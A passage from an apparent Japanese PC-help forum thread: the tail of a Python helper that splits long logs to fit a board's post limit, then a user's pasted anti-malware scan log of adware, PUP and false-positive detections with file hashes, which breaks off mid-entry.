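        raise ValueError("budget exceeds the board limit")
    room = budget - text_cost(subject)
    if room < NEWLINE_COST + 3:
        raise ValueError("subject leaves no room for log text")
    parts, current, used = [], [], 0
    for line in _normalize(log).split("\n"):
        # A line break is charged per line, which slightly overestimates.
        for piece in _pieces(line, room - NEWLINE_COST):
            cost = text_cost(piece) + NEWLINE_COST
            if current and used + cost > room:
                parts.append("\n".join(current))
                current, used = [], 0
            current.append(piece)
            used += cost
    if current:
        parts.append("\n".join(current))
    return parts


# Constructed sample input, not taken from the thread's logs.
SAMPLE_LOG = "\n".join(
    f"キー 削除済み項目 : HKLM\\SOFTWARE\\Example{i}" for i in range(200)
)

if __name__ == "__main__":
    subject = "Re: log part"
    for n, part in enumerate(split_log(SAMPLE_LOG, subject, budget=2000), 1):
        print(f"part {n}: {text_cost(part) + text_cost(subject)} bytes")
```

Lines are kept whole unless a single line alone exceeds the budget, in which case it is cut at a character boundary.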
  • IVNO
  • MAIL
  • 2015/04/20 (Mon) 19:16:09
Re: I am troubled by pop-ups and ads being forcibly displayed.
Thank you for the instructions.
I will paste the logs below, so please give me instructions.

HP log 1

Saved date: 2015/04/21 1:34:25
Files detected: 148
Files scanned: 9,244
Processes scanned: 56
Modules scanned: 616
ASEPs scanned: 500
Downloads scanned: 21
Deep analysis: 129/33
---------------------------------------------------------------------------------

Files

---------------------------------------------------------------------------------

File path: c:\program files\intel\icls client\heciserver.exe
Publisher: Intel(R) Corporation
Signer: Intel® Upgrade Service
MD5: b353f1834fcd36d77be3f74992c147d4
SHA-1: 95db008d29b9ae312ccdda744f474c2d72cc5388
Created: 2012/06/19 19:10:34
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Gen:Variant.Kazy.20914 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\divx\divx update\divxupdate.exe
Publisher:
Signer: DivX, LLC
MD5: c7f05a3fd4a8dc4ee7a7866876e1534c
SHA-1: a217384831c5dedc7a39566486867236fffc0de9
Created: 2013/11/15 9:48:30
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.Startup.DivX.K

---------------------------------------------------------------------------------

File path: c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.8428_none_d08a11e2442dc25d\msvcr80.dll
Publisher: Microsoft Corporation
MD5: a58e3c42883f36d743f9be9b21bfc990
SHA-1: 5a3fb51c414bde296273e41198ecb1a2aa9e3b03
Created: 2013/08/22 8:53:00
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.Laneul (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\amarectv live\amvideocapture.ax
Publisher: Microsoft Corporation
MD5: 36ffb794024c27b89d3934e0e82545d4
SHA-1: bbf41bf443763f5b5a721d3bc27952fe5c353b75
Created: 2013/08/25 17:40:25
Detections: 1
Determination: Inconclusive
- Dr.Web as Trojan.DownLoader.origin (Undefined)

---------------------------------------------------------------------------------

File path: c:\windows\system32\drivers\intcdaud.sys
Publisher: Intel(R) Corporation
MD5: f5495b38bfb9149925f54f65ab40efbf
SHA-1: 3fbef8ee216245a0b26e3fb24f6345605a0b440b
Created: 2012/09/20 11:39:50
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Gen:Variant.Adware.SMSHoax.95 (Adware)

---------------------------------------------------------------------------------

File path: c:\windows\downloaded program files\hgstartjp28.exe
Publisher: NHN Japan Corp.
Signer: NHN PlayArt Corporation
MD5: d46fa9949bc57a861613708035cb66fa
SHA-1: d605dacdb0cb140033a3d8711c2d563fccd6e08f
Created: 2013/12/25 10:19:38
Detections: 1
Determination: Ignore detections (false positive)
- Vba32 AntiVirus as suspected of Trojan.Downloader.gen.h (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\cjhlcgankhfaeohlngbhkhbnhmhaokmc\manifest.json
Publisher:
MD5: ebb718d9043c987b2a05265acfab9493
SHA-1: df01f0e262d5b287a78c4d7eadfe7ed7eadd9cd9
Created: 2015/02/25 17:39:32
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension.UnIDealsi (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\fjaicoojlfoococemdcaollmhaiolole\207\manifest.json
Publisher:
MD5: 66adcd8e1f66a3bf3ead0886bd4d0ff8
SHA-1: 08f087938774243023749b8bd237b58069f4f119
Created: 2015/03/04 15:50:12
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\foiapgoppijipmmgkaibacckkhbngfhp\171\manifest.json
Publisher:
MD5: ee8011d5d5c5b99b03ce5ea057a656ba
SHA-1: 087e8440edf21b761da86ebac8c364f0ff0a18aa
Created: 2015/03/24 16:16:07
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\manifest.json
Publisher:
MD5: 0bbe417460075bdd8b42b3e04e936a02
SHA-1: 93b022ad36611ffb7ff14a37b91aa45a8cebee0a
Created: 2015/02/04 12:00:08
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0\manifest.json
Publisher:
MD5: 93e34b017b195ac98aba32e64eede9f2
SHA-1: bfa2f63a3c2189cdb8696422f2fd9d4be2f2dbe5
Created: 2015/02/04 12:00:09
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0\manifest.json
Publisher:
MD5: a714af2a39fed9f5dc8346b530c2fc39
SHA-1: 823115c02f95d4928dc78b01632a7349a4bd597c
Created: 2015/04/04 21:32:07
Detections: 1
Determination: Adware
- Reason Heuristics as Adware.Obscure.WebPick.ChromePlugin (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\manifest.json
Publisher:
MD5: 2d922aa30def0a058f85601f8acb5ce5
SHA-1: 62f069a274a987013c2c75ad46a4487355b0dea2
Created: 2014/05/10 0:40:48
Detections: 1
Determination: Adware
- Reason as PUP.Chrome.Extension (Adware)

---------------------------------------------------------------------------------

File path: c:\programdata\neopleplugin\npneoplegameinstaller.dll
Publisher:
Signer: Neople Inc.
MD5: c3517e56484ee9a628e4d30553ee53cd
SHA-1: 395542a67a1c8304b1bbcd75ba737d90e3624b47
Created: 2014/01/21 0:49:30
Detections: 1
Determination: Ignore detections (false positive)
- Trend Micro House Call as TROJ_GEN.F47V0305 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\tw628j.exe
Publisher: Nexon
MD5: 981d03f6045afca56c2bd65569f2d9b3
SHA-1: 64dfbeea35f8bb552cf4d596adc70e00df231e4b
Created: 2014/12/27 19:42:39
Detections: 4
Determination: UndefinedMalware
- McAfee as Artemis!981D03F6045A (Undefined)
- Trend Micro House Call as Suspicious_GEN.F47V0320 (Undefined)
- Dr.Web as Trojan.DownLoader12.31742 (Undefined)
- Vba32 AntiVirus as suspected of Trojan.Downloader.gen.h (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\cr_downloader_for_super-smash-bros..exe
Publisher:
Signer: eCHANG Net Inc.
MD5: a5d94a42084583274d587f2658efd487
SHA-1: 2fc5943c64add6d948b40906fa7c53691c15901f
Created: 2014/11/14 12:33:39
Detections: 13
Determination: Adware
- Reason Heuristics as Threat.Installer.eCHANGNet (Undefined)
- Dr.Web as Trojan.InstallCore.260 (Adware)
- ESET NOD32 as Win32/InstallCore.TS potentially unwanted application (Adware)
- VIPRE Antivirus as Threat.4786018 (Undefined)
- Bkav FE as W32.HfsAdware (Adware)
- Zillya! Antivirus as Adware.InstallCore.Win32.156 (Adware)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- K7 AntiVirus as Unwanted-Program (Adware)
- Agnitum Outpost as PUA.InstallCore (Adware)
- Comodo Security as Application.Win32.InstallCore.DSQ (Adware)
- Sophos as Install Core Click run software (Undefined)
- G Data as Win32.Application.InstallCore.CR (Adware)
- AVG as Generic (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\setup project64 2.1.exe
Publisher:
MD5: 1ee1efeb58a4047d6e2478e77f4da082
SHA-1: c3937102b74aae33c7725020f68d998a99cd044b
Created: 2014/11/13 22:01:41
Detections: 1
Determination: Ignore detections (false positive)
- NANO AntiVirus as Trojan.Win32.Ramnit.ctcknk (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\dtlite4491-0356.exe
Publisher: Disc Soft Ltd
Signer: Disc Soft Ltd
MD5: 0fa6cd1de96bde0431c1c91904f6d040
SHA-1: e750c443a83f9b135b499e7917c5a93120384bb3
Created: 2014/10/28 20:23:09
Detections: 5
Determination: Adware
- Malwarebytes as PUP.Optional.OpenCandy (Adware)
- Trend Micro House Call as TROJ_GEN.F47V0313 (Undefined)
- VIPRE Antivirus as Opencandy (Adware)
- ESET NOD32 as Win32/DownWare (Adware)
- Rising Antivirus as PE:PUF.OpenCandy!1.9DE5 (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\daemon347_inst.exe
Publisher:
Signer: Well Known Media Ltd
MD5: 631515cfed3b53893ff8f3869ec3b842
SHA-1: ebeb8dee144e1b00ea78467dddc1eb0a50cc2e7c
Created: 2014/10/28 20:19:37
Detections: 13
Determination: Adware
- Reason Heuristics as Threat.Installer.WellKnownMedia (Undefined)
- Dr.Web as Trojan.InstallCore.2 (Adware)
- VIPRE Antivirus as Threat.4786018 (Undefined)
- K7 AntiVirus as Unwanted-Program (Adware)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- NANO AntiVirus as Riskware.Win32.InstallCore.dhpyhc (Adware)
- Sophos as PUA 'Install Core Click run software' (Undefined)
- Avira AntiVirus as Adware/InstallCore.770360 (Adware)
- ESET NOD32 as Win32/InstallCore.QS potentially unwanted application (Adware)
- AVG as Generic (Undefined)
- Agnitum Outpost as PUA.InstallCore (Adware)
- Comodo Security as Application.Win32.InstallCore.AEK (Adware)
- Bkav FE as W32.HfsAdware (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\fileopenersetup.exe
Publisher:
Signer: Delivery X Apps
MD5: a007ca72a067429e55c9eef1c75b3bf9
SHA-1: 2725608ca62fa23b4761cec758892695955fcb27
Created: 2014/10/28 20:18:36
Detections: 11
Determination: Adware
- Reason Heuristics as Threat.installCore.Installer.ironSource (Adware)
- avast! as Malware-gen (Undefined)
- VIPRE Antivirus as Threat.4788237 (Undefined)
- AVG as Potentially harmful program Toolbar.MySearchDial (Undefined)
- F-Prot as W32/InstallCore.AG.gen (Adware)
- NANO AntiVirus as Riskware.Win32.InstallCore.dqhert (Adware)
- McAfee Web Gateway as BehavesLike.Win32.CryptInno.bc (Undefined)
- Avira AntiVirus as PUA/InstallCore.Gen (Adware)
- G Data as Win32.Application.InstallCore.CZ (Adware)
- ESET NOD32 as Win32/InstallCore.RY potentially unwanted (variant) (Adware)
- IKARUS anti.virus as PUA.Toolbar.MySearchDial (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\freemakeaudioconvertersetup.exe
Publisher: Ellora Assets Corporation
Signer: Ellora Assets Corp.
MD5: 397f5109b66b79533e85762419bfc058
SHA-1: 87ce2c0ccabef8c1e9ec55d5e69ebb79b6476a77
Created: 2014/06/29 0:07:11
Detections: 5
Determination: Adware
- NANO AntiVirus as Riskware.Win32.OpenCandy.cxjcyz (Adware)
- ESET NOD32 as Win32/OpenCandy (Adware)
- Trend Micro House Call as TROJ_GEN.F47V0526 (Undefined)
- Dr.Web as Adware.Toolbar.213 (Adware)
- Fortinet FortiGate as Riskware/OpenCandy (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\lineinst.exe
Publisher: LINE Corporation
Signer: LINE Corporation
MD5: 3cd964cdf714f4d1158fa64f47293abf
SHA-1: 59963b608ae4972f051fda607b8538d42cd31abb
Created: 2014/05/28 21:50:48
Detections: 1
Determination: Ignore detections (false positive)
- IKARUS anti.virus as Trojan.Win32.Tracur (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\downloadmanagersetup.exe
Publisher:
Signer: ADLSoft
MD5: 28f98f137b7d2873318cea6687d245f9
SHA-1: b27868ce2fc27aa875bf13ea1d1e5dcc88959f24
Created: 2014/05/14 18:30:29
Detections: 18
Determination: Adware
- Reason Heuristics as Threat.ironSource.Installer (Undefined)
- Dr.Web as Trojan.Packed.24524 (Undefined)
- VIPRE Antivirus as Threat.4788237 (Undefined)
- Malwarebytes as PUP.Optional.InstallCore.A (Adware)
- Agnitum Outpost as PUA.InstallCore (Adware)
- Avira AntiVirus as ADWARE/InstallCore.Gen9 (Adware)
- Sophos as PUA 'Install Core Click run software' (Undefined)
- ESET NOD32 as Win32/InstallCore.JP potentially unwanted application (Adware)
- AVG as InstallC (Undefined)
- Qihoo 360 Security as Malware.QVM06.Gen (Undefined)
- avast! as Malware-gen (Undefined)
- Zillya! Antivirus as Trojan.Badur.Win32.4817 (Undefined)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- K7 AntiVirus as Unwanted-Program (Adware)
- NANO AntiVirus as Riskware.Win32.InstallCore.dfgmky (Adware)
- McAfee Web Gateway as BehavesLike.Win32.CryptInno.bc (Undefined)
- G Data as Win32.Application.InstallCore.CZ (Adware)
- Bkav FE as W32.HfsAdware (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\adlsoft_uncompressor_v2_3.exe
Publisher:
Signer: ADLSoft
MD5: 56f67f390f2a6e24cc0dc5592d67c389
SHA-1: 1730c54cdc126a1623fbfad34179571b467261ee
Created: 2012/11/08 19:00:58
Detections: 10
Determination: Adware
- Dr.Web as Adware.InstallCore.75 (Adware)
- Avira AntiVirus as ADWARE/InstallCore.Gen (Adware)
- Sophos as Install Core ADLSoft (Undefined)
- Antiy Labs AVL as Trojan/Win32.SGeneric (Undefined)
- AhnLab V3 Security as Adware/Win32.InstallCore (Adware)
- Vba32 AntiVirus as BScope.Malware-Cryptor.InstallCore.2691 (Adware)
- ESET NOD32 as Win32/InstallCore.AY (variant) (Adware)
- Rising Antivirus as PE:Malware.XPACK-LNR/Heur!1.5594 (Undefined)
- Fortinet FortiGate as Riskware/InstallCore (Adware)
- Reason Heuristics as PUP.ADLSoft.J (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\ccsetup404.exe
Publisher: Piriform Ltd
Signer: Piriform Ltd
MD5: c748c104ba13a9456496d264c4161e7c
SHA-1: 6525f85f423a8acb9de261fce7c1bfdcaf0651ec
Created: 2013/08/24 1:43:16
Detections: 1
Determination: Ignore detections (false positive)
- ESET NOD32 as Win32/Bundled.Toolbar.Google (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\ccsetup413.exe
Publisher: Piriform Ltd
Signer: Piriform Ltd
MD5: 55bc08e32879a3de7386a2695d668304
SHA-1: da0fb77cecb4247f067294da5e54e0020844fece
Created: 2014/05/10 0:39:40
Detections: 1
Determination: Ignore detections (false positive)
- ESET NOD32 as Win32/Bundled.Toolbar.Google (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\chorokuf128a(1).exe
Publisher: web technology Corp.
http://www.webtech.co.jp/exepress/
MD5: ab8132bb986a626a7aba2cf08d611c56
SHA-1: 2d1ee43f2758cf9b7933c34bdd58c63081eded43
Created: 2014/02/12 20:23:31
Detections: 1
Determination: Inconclusive
- Sophos as CnsMin (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\chorokuf128a.exe
Publisher: web technology Corp.
http://www.webtech.co.jp/exepress/
MD5: ab8132bb986a626a7aba2cf08d611c56
SHA-1: 2d1ee43f2758cf9b7933c34bdd58c63081eded43
Created: 2014/02/12 20:22:51
Detections: 1
Determination: Inconclusive
- Sophos as CnsMin (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\codecpackage.exe
Publisher:
Signer: JumpyApps
MD5: 554bd7664471d159f2a48b254c1f05ac
SHA-1: 699dd12ad0dc35006a1e677478d2858532caae90
Created: 2014/02/15 0:24:09
Detections: 14
Determination: Adware
- Reason Heuristics as Threat.ironSource.Bundler (Undefined)
- Dr.Web as Trojan.Packed.24524 (Undefined)
- VIPRE Antivirus as Threat.4786018 (Undefined)
- Bkav FE as W32.HfsAdware (Adware)
- K7 AntiVirus as Unwanted-Program (Adware)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- NANO AntiVirus as Trojan.Win32.Kryptik.cwezfs (Undefined)
- Comodo Security as Application.Win32.InstallCore.KH (Adware)
- Sophos as Install Core Click run software (Undefined)
- AhnLab V3 Security as PUP/Win32.DownloadManager (Adware)
- G Data as Win32.Application.InstallCore (Adware)
- ESET NOD32 as Win32/InstallCore.JK potentially unwanted (variant) (Adware)
- AVG as InstallCore (Adware)
- Panda Antivirus as Trj/Genetic.gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\dolphin-3.5-x64.exe
Publisher: Igor Pavlov
MD5: 701b0088f5e0cd0611b4d87a4f2e13c0
SHA-1: 0755acd03cc6540bf938706e1e75bb63fb1c3bfd
Created: 2013/01/27 5:35:27
Detections: 1
Determination: Ignore detections (false positive)
- ViRobot as Trojan.Win32.A.Clicker.5457448 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\downloader_for_shaman%20king%20card%20game%20-%20chou%20senjiryakketsu%202%20%28japan%29(1).exe
Publisher: SoftWarehouse
Signer: Artur Kozak
MD5: 54179095d23898a8bae9bfa3c8549233
SHA-1: 44b8769b4326e52366987f495108a90b3dd185cf
Created: 2014/01/12 15:33:31
Detections: 35
Determination: Adware
- Reason Heuristics as Adware.WebPick.Installer (Adware)
- McAfee as Program.PUP-FHQ (Adware)
- F-Prot as W32/InstallRex.B (Undefined)
- Dr.Web as Trojan.WebPick.4 (Undefined)
- ESET NOD32 as Win32/InstalleRex.M potentially unwanted application (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- Emsisoft Anti-Malware as Gen:Variant.Application.Bundler.InstallRex (Undefined)
- F-Secure as Riskware.Gen:Variant.Application.Bundler (Adware)
- avast! as Win32:InstalleRex-AH [PUP] (Adware)
- Kaspersky as Trojan.Win32.AntiFW (Undefined)
- VIPRE Antivirus as Threat.4150696 (Undefined)
- Bkav FE as W32.FamVT.AntiFWK.Trojan (Undefined)
- MicroWorld eScan as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- Quick Heal as Trojan.AntiFW.A5 (Undefined)
- Malwarebytes as PUP.Optional.InstalleRex (Adware)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- K7 AntiVirus as Unwanted-Program (Adware)
- NANO AntiVirus as Riskware.Win32.Downware.csjrze (Adware)
- Bitdefender as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- Agnitum Outpost as PUA.InstalleRex (Adware)
- Comodo Security as Application.Win32.InstalleRex.KG (Adware)
- Zillya! Antivirus as Downloader.Adload.Win32.16938 (Undefined)
- McAfee Web Gateway as BehavesLike.Win32.StartPage.fc (Undefined)
- Sophos as InstallRex (Undefined)
- Avira AntiVirus as ADWARE/InstallRex.Q (Adware)
- Antiy Labs AVL as Trojan/Win32.AntiFW.b (Undefined)
- Kingsoft AntiVirus as Win32.Troj.Generic.a.(kcloud) (Undefined)
- AhnLab V3 Security as PUP/Win32.TSULoader (Adware)
- G Data as Gen:Variant.Application.Bundler.InstallRex (Undefined)
- Vba32 AntiVirus as AdWare.Agent (Adware)
- Rising Antivirus as PE:Trojan.DL.Win32.AntiFW.a!1075355932 (Undefined)
- IKARUS anti.virus as PUA.TDownloader (Adware)
- Fortinet FortiGate as Riskware/InstalleRex (Undefined)
- AVG as InstallRex.7cb (Undefined)
- Panda Antivirus as PUP/TSUploader (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\downloader_for_shaman%20king%20card%20game%20-%20chou%20senjiryakketsu%202%20%28japan%29.exe
Publisher: SoftWarehouse
Signer: Artur Kozak
MD5: 96b51a7d042bdd49c56fa49654fee130
SHA-1: c76502c49134c78c792852a144fe23981dcf8a3d
Created: 2014/01/12 15:33:16
Detections: 36
Determination: Adware
- Reason Heuristics as Adware.WebPick.Installer (Adware)
- Dr.Web as Trojan.WebPick.4 (Undefined)
- avast! as Win32:InstalleRex-AH [PUP] (Adware)
- F-Prot as W32/InstallRex.B (Undefined)
- McAfee as Program.PUP-FHQ (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Application.Bundler.InstallRex (Undefined)
- ESET NOD32 as Win32/InstalleRex.M potentially unwanted application (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- F-Secure as Riskware.Gen:Variant.Application.Bundler (Adware)
- VIPRE Antivirus as Threat.4150696 (Undefined)
- Clam AntiVirus as Win.Trojan.Installerex-28 (Undefined)
- Bkav FE as W32.FamVT.AntiFWK.Trojan (Undefined)
- MicroWorld eScan as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- Quick Heal as Trojan.AntiFW.A5 (Undefined)
- Malwarebytes as PUP.Optional.InstalleRex (Adware)
- K7 Gateway Antivirus as Unwanted-Program (Adware)
- K7 AntiVirus as Unwanted-Program (Adware)
- NANO AntiVirus as Riskware.Win32.Downware.csjrze (Adware)
- Bitdefender as Gen:Variant.Application.Bundler.InstallRex.2 (Undefined)
- Agnitum Outpost as PUA.InstalleRex (Adware)
- Comodo Security as Application.Win32.InstalleRex.KG (Adware)
- Zillya! Antivirus as Downloader.Adload.Win32.16938 (Undefined)
- McAfee Web Gateway as BehavesLike.Win32.StartPage.fc (Undefined)
- Sophos as InstallRex (Undefined)
- Avira AntiVirus as ADWARE/InstallRex.Q (Adware)
- Antiy Labs AVL as Trojan/Win32.AntiFW.b (Undefined)
- Kingsoft AntiVirus as Win32.Troj.Generic.a.(kcloud) (Undefined)
- AhnLab V3 Security as PUP/Win32.TSULoader (Adware)
- G Data as Gen:Variant.Application.Bundler.InstallRex (Undefined)
- Vba32 AntiVirus as AdWare.Agent (Adware)
- Rising Antivirus as PE:Trojan.DL.Win32.AntiFW.a!1075355932 (Undefined)
- IKARUS anti.virus as PUA.TDownloader (Adware)
- Fortinet FortiGate as Riskware/InstalleRex (Undefined)
- AVG as InstallRex.7cb (Undefined)
- Panda Antivirus as PUP/TSUploader (Adware)
- Kaspersky as Trojan.Win32.AntiFW (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\dtlite4454-0314.exe
Publisher: DT Soft Ltd
Signer: DT Soft Ltd
MD5: 2763b8ac8f1e3a56241600a70a2923a6
SHA-1: 4743c9c447de0f25d3ac8b6009d7265f5721df05
Created: 2012/12/15 23:20:26
Detections: 5
Determination: Adware
- Malwarebytes as PUP.Optional.OpenCandy (Adware)
- VIPRE Antivirus as Opencandy (Adware)
- Antiy Labs AVL as Virus/Win32.Suspic.gen (Undefined)
- ESET NOD32 as Win32/Bundled.Toolbar.Google (Undefined)
- Rising Antivirus as NS:Malware.Install!1.9F62 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\file_opener.exe
Publisher:
Signer: Fried Cookie Ltd
MD5: 0775db62b3bff112aa1150bc831c1ff5
SHA-1: bd5e4e695f47d0812d435dda57d3bad789143ee7
Created: 2013/08/03 2:24:09
Detections: 18
Determination: Adware
- MicroWorld eScan as Gen:Variant.Application.InstallCore.1 (Adware)
- The Hacker as Trojan/Kryptik.pvk (Undefined)
- K7 Gateway Antivirus as Trojan (Undefined)
- K7 AntiVirus as Trojan (Undefined)
- Norman as FakeNSIS.A (Undefined)
- Bitdefender as Gen:Variant.Application.InstallCore.1 (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Application.InstallCore.1 (Adware)
- Sophos as Install Core Installer (Undefined)
- Comodo Security as UnclassifiedMalware (Undefined)
- F-Secure as Gen:Variant.Application.InstallCore (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Avira AntiVirus as ADWARE/InstallCore.Gen (Adware)
- Microsoft Security Essentials as SoftwareBundler:Win32/DealPly (Undefined)
- G Data as Gen:Variant.Application.InstallCore (Adware)
- Vba32 AntiVirus as Downware.InstallCore (Adware)
- ESET NOD32 as Win32/InstallCore.BG (Adware)
- IKARUS anti.virus as SoftwareBundler (Undefined)
- Reason Heuristics as PUP.FriedCookie.L (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\gasim_117_bin.exe
Publisher: heropa@dream.com
MD5: 489d4beb27ccac989c15968887548de0
SHA-1: c27eb6b337d4a7a1aafedf16d1c64147d7c66713
Created: 2012/11/04 11:27:38
Detections: 1
Determination: Ignore detections (false positive)
- Zillya! Antivirus as Trojan.Obfuscated.Win32.69460 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\hijackthis (1).exe
Publisher: Trend Micro Inc.
MD5: 47811d50390a86a17102d7496e6eabb9
SHA-1: 2623749cdb27887f6746acdee7e8065475f8b541
Created: 2015/03/20 18:33:59
Detections: 2
Determination: Ignore detections (false positive)
- Kingsoft AntiVirus as Win32.HeurC.KVM099.a.(kcloud) (Undefined)
- Rising Antivirus as PE:Trojan.VBInject!1.6546 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\installer_manycam_3_0_92_japanese.exe
Publisher:
Signer: Vittalia Internet S.L.
MD5: 8afbd41939d934a25e2e093ef0be29f0
SHA-1: 52e7fe579be76a761e1a4f59c194a434163bc72b
Created: 2012/11/06 16:22:08
Detections: 15
Determination: Adware
- Reason Heuristics as Threat.Vittalia.Bundler (Undefined)
- Dr.Web as Trojan.Vittalia.38 (Undefined)
- ESET NOD32 as Win32/Toolbar.Babylon potentially unwanted application (Adware)
- VIPRE Antivirus as Threat.4782551 (Undefined)
- Bkav FE as W32.HfsAdware (Adware)
- McAfee as Artemis!75E68C0C7910 (Undefined)
- Malwarebytes as PUP.Optional.VIT (Adware)
- Norman as InstallCore.WTRR (Adware)
- NANO AntiVirus as Riskware.Nsis.Adware.dciphs (Adware)
- McAfee Web Gateway as BehavesLike.Win32.Suspicious.vc (Undefined)
- Avira AntiVirus as ADWARE/Vittalia.AB (Adware)
- Kingsoft AntiVirus as Win32.Malware.Heur_Generic.A.(kcloud) (Undefined)
- Rising Antivirus as NS:PUF.SilenceInstaller!1.9DDF (Undefined)
- AVG as Win.Threat.Medium (Undefined)
- Qihoo 360 Security as Trojan.Generic (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\lpls159.exe
Publisher:
MD5: c32d41f732157a8802c9215789623551
SHA-1: e7a3240a750fd0e7f1f174bf1743e21ceca81c36
Created: 2012/11/04 11:20:03
Detections: 1
Determination: Ignore detections (false positive)
- Vba32 AntiVirus as suspected of Trojan.StartPage.7 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\rcpsetupdsnr_ds367212.exe
Publisher: Systweak Inc
Signer: Systweak Software
MD5: e86327e2048326af5065ce3e2970c776
SHA-1: abf2e0f5fc59de2cbf4044921a73e8d1ac6ff39a
Created: 2013/08/21 22:52:38
Detections: 2
Determination: Inconclusive
- Malwarebytes as PUP.Optional.RegCleanerPro (Adware)
- Reason Heuristics as PUP.Optional.Installer.SystweakSoftware.V (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\setup.exe
Publisher:
Signer: Fried Cookie Ltd
MD5: 45e2a98e47c209814bcea691bcac5f78
SHA-1: 6717a81c60116dfc1004665c269044de9c506cd2
Created: 2013/03/16 4:00:44
Detections: 8
Determination: Adware
- Reason Heuristics as Threat.ironSource.Bundler (Undefined)
- Dr.Web as Trojan.Packed.24524 (Undefined)
- VIPRE Antivirus as Threat.4786018 (Undefined)
- Bkav FE as W32.HfsAdware (Adware)
- NANO AntiVirus as Riskware.Nsis.Babylon.cwhyhv (Adware)
- McAfee Web Gateway as BehavesLike.Win32.Suspicious.vc (Undefined)
- Vba32 AntiVirus as suspected of Trojan.Downloader.gen.h (Undefined)
- AVG as MultiBundle (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\setupmbs.exe
Publisher:
MD5: 6126b4029e2c746348a2ed4e2eabf517
SHA-1: 6546816bf88508a3a1f78685b13467abc53fd7bd
Created: 2015/02/05 19:59:12
Detections: 1
Determination: Ignore detections (false positive)
- Qihoo 360 Security as HEUR/QVM41.1.Malware.Gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\soundengine_free_500.exe
Publisher: Coderium
MD5: b3395cbbda3be3f535aa233161ad2589
SHA-1: 67bdcd5c5985bc8b42b04f8713eb466a293850b9
Created: 2012/10/31 21:01:25
Detections: 2
Determination: Ignore detections (false positive)
- F-Prot as W32/Backdoor2.BFDU (Undefined)
- Antiy Labs AVL as Trojan/Win32.TSGeneric (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\vlcmediaplayersetup-6zgtwof.exe
Publisher:
Signer: Somoto Ltd.
MD5: aaa3b894bae6569f0146d7f0c6105308
